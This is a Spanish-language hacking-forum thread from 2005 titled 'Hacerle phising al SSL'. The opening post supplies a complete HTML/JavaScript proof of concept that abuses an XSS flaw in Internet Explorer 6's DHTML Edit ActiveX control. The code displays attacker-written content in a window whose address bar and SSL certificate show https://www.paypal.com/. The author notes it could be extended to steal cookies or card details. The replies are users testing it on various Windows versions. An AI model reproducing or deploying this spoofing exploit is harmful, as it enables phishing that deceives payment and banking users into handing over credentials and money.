elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Píldoras formativas en seguridad de la información


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, toxeek)
| | |-+  Hacerle phising al SSL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: Hacerle phising al SSL  (Leído 27,913 veces)
Unravel
BlueHack Team


Desconectado Desconectado

Mensajes: 1.016



Ver Perfil
Hacerle phising al SSL
« en: 13 Enero 2005, 03:52 »

Wenas a todos,

Voy a cambiar de tercio esta vez, no vaya a ser que me encasilleis en criptografía ;).

Hace unos días ví que apareció una vulnerabilidad XSS en el  ActiveX DHTML Edit Control del IE6.0, y que tiene unas posibilidades increíbles, sobre todo para ataques tipo "phising".

Un atacante podría simular una web segura, de cualquier sistema de pago o entidad bancaria por ejemplo, manteniendo la URL del sistema falsificado, su certificado de servidor, e incluso su tráfico de cookies.

Os pego un programilla para que jugueis. Solo teneis que guardarlo como html.

Espero que os guste.

Salu2.

Código:
<html>
<head>
</head>
<body>

<center>
<b>Vulnerabilidad XSS IE6.0 para phising SSL</b><br>
<br>
Pincha en el link de abajo para comprobar si tu sistema es vulnerable. este test abrirá una ventana nueva, con la URL "https://www.paypal.com/", pero mostrando el contenido de este HTML.<br>
<br>
<b>Test de vulnerabilidad</b><br>
<a href="javascript:start();"><font color="#000000">Haz clink en este link</font></a><br>
<br>
</center>

<!-- Esto evidentemente no tendrá ningún efecto si no está activadas las secuencias de comandos ActiveX en nuestro navegador -->
<!-- DHTML Edit Control -->
<object id="edtcon" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0">
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>

<script>
function trigger()
{
  window.name = "poorchild";
  open("https://www.paypal.com/", "poorchild");
/*
Incluso las cookies son transferidas a través del Dhtml Edit control. Esto implica entre otras cosas, que por ejemplo
http://by22fd.bay22.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001
funcionará correctamente, siempre que el usuario ya esté logado, por supuesto.
Je, je, el sueño de los lammers caza hotmails.
Nota: No voy a desarrollar nada del script para robo de cookies ni esas cosas por razones obvias. Esto solo hace phising.
*/
}

function payload()
{
  url = "https://www.paypal.com/";
  s = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">' +
'<HTML>' +
'<HEAD>' +
'<TITLE> Internet Explorer Cross Site Scripting </TITLE>' +
'</HEAD>' +
'<BODY bgcolor="#FFFFFF">' +
'<center>' +
'<table width="80%" cellspacing="0" cellpadding="0">' +
'<tr>' +
'<td height="20" align="center">Internet Explorer Cross Site Scripting en SSL</td>' +
'</tr>' +
'<tr><td><br></td></tr>' +
'<tr>' +
'<td>El contenido que estas visualizando es el de este HTML, aunque en el <b>Address Bar</b> nos indica que estamos en: <b>https://www.paypal.com/</b><br>' +
'<br>' +
'Puedes hacer click en el icono del candado SSL, para comprobar como el certificado del servidor claramente nos asegura que estamos en: <b>https://www.paypal.com/</b><br>' +
'<br>' +
'Esta página podría fácilmente programarse para robar información de las cookies (usernames, passwords, session IDs, etc.), o para engañar al usuario solicitándole información privada (tarjetas de crédito, etc), o para hacerle instalarse un programa, o lo que se nos ocurra ;).<br>' +
'<br>' +
'Esta vulnerabilidad también permite al atacante ejecutar scripts arbitrarios, etc. Las posibilidades sólo las limita la imaginación.<br>' +
'<br>' +
'<br>' +
'<center><a href="javascript:window.close();">Cerrar esta ventana</a></center></td>' +
'</tr>' +
'<tr><td><br></td></tr>' +
'<tr>' +
'<td height="20" align="center"> Internet Explorer Cross Site Scripting con SSL</td>' + 
'</table>' +
'</center>' +
'</BODY>' +
'</HTML>';
  w = open(url, "paypal");
  w.document.write(s);
}

function start()
{
  edtcon.DOM.Script.execScript(trigger.toString());
  edtcon.DOM.Script.setTimeout("trigger()");
  poll();
}

function poll() {
  try {
    edtcon.DOM.location.href;
    setTimeout('poll()', 100);
  }
  catch (e) {
    edtcon.DOM.Script.execScript(payload.toString());
    edtcon.DOM.Script.setTimeout("payload()");
  }
}
</script>
</body>
</html>
« Última modificación: 13 Enero 2005, 09:16 por unravel » En línea

"La verdad es un ácido corrosivo que salpica casi siempre al que la maneja". Santiago Ramón y Cajal.
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.305


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Hacerle phising al SSL
« Respuesta #1 en: 13 Enero 2005, 04:40 »

Con un Windows XP Prof SP2, ocurren cosas extrañas.....

Primero no deja ejecutarlo (gracias al SP2), ver primera imagen, y después si lo ejecuto, me salta el Windows Installer del Office 2000.

No entiendo nada, no me sale una nueva ventana.
En línea

Since 2001, still kicking hard
Unravel
BlueHack Team


Desconectado Desconectado

Mensajes: 1.016



Ver Perfil
Re: Hacerle phising al SSL
« Respuesta #2 en: 13 Enero 2005, 04:56 »

Al probarlo lo he hecho en W2000 con todos los SP y IE6.0.

Con XP SP2 supongo que estarán desactivados las ejecuciones de los los controles ActiveX, mira a ver si eso.

Esto se supone que funciona en IE6.0, incluyendo todos los sistemas con todos sus SP (se me olvidó comentar que es para IE6).

De todas formas, que salte el instalador, no sé, es raro.

A ver si salimos de dudas conforme la gente lo vaya probando.
En línea

"La verdad es un ácido corrosivo que salpica casi siempre al que la maneja". Santiago Ramón y Cajal.
zaerik


Desconectado Desconectado

Mensajes: leet



Ver Perfil
Re: Hacerle phising al SSL
« Respuesta #3 en: 13 Enero 2005, 05:17 »

Hola,

Pues si que a funcionado, e probado en un XP SP1 con IE6 y es vulnerable :P.
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re: Hacerle phising al SSL
« Respuesta #4 en: 13 Enero 2005, 05:51 »

Juas.

A mi tb me ha funcionado, pero solo 1 de 2.

La primera vez salio todo, pero me decia que la pagina web no tenia certificado o no era correcto.

La segunda, si me salio la de paypal perfectamente, menuda pasada de bug.....

Salu2
En línea

Unravel
BlueHack Team


Desconectado Desconectado

Mensajes: 1.016



Ver Perfil
Re: Hacerle phising al SSL
« Respuesta #5 en: 13 Enero 2005, 06:01 »

Estoy revisando el código a ver si es que he metido la pata en algún lado, porque he hecho muchas pruebas y variantes con él, y lo mismo he dejado algo mal, pero no veo nada incorrecto. No sé, es cuestión de seguir probando, ya lo depuraré.

A ver si la gente se anima y lo prueba.
En línea

"La verdad es un ácido corrosivo que salpica casi siempre al que la maneja". Santiago Ramón y Cajal.
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.178


>.<


Ver Perfil WWW
Re: Hacerle phising al SSL
« Respuesta #6 en: 13 Enero 2005, 08:43 »

Ps, si que manda el installer :-\ sera que no soy vulnerable? ;D
tengo Win2k 5.00.2195 pro SP4 x)
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.305


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Hacerle phising al SSL
« Respuesta #7 en: 13 Enero 2005, 08:48 »

joder ya era hora, bienvenido al Club Aziel.

A mi con otro Windows XP SP1 también se abre el instalador del Office 2000.

Me queda por probar en un Windows 2000 Server del trabajo y en un Windows XP HE en inglés xD
En línea

Since 2001, still kicking hard
Unravel
BlueHack Team


Desconectado Desconectado

Mensajes: 1.016



Ver Perfil
Re: Hacerle phising al SSL
« Respuesta #8 en: 13 Enero 2005, 09:12 »

Pues vaya, que cosas, yo tengo un w2k 5.00.2195 pro SP4 igual que Azielito y si me funciona perfectamente.
Puedes confirmarme la versión del IE que tienes? A ver si va a ser eso.

« Última modificación: 13 Enero 2005, 09:20 por unravel » En línea

"La verdad es un ácido corrosivo que salpica casi siempre al que la maneja". Santiago Ramón y Cajal.
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.305


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Hacerle phising al SSL
« Respuesta #9 en: 13 Enero 2005, 09:17 »

si se supone que estamos usando Windows con todos los parches posibles, pues en mi caso uso el IE 6.0 e imagino que Aziel también.

Mi versión del Office 2000 también la "Premium".
En línea

Since 2001, still kicking hard
Páginas: [1] 2 3 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines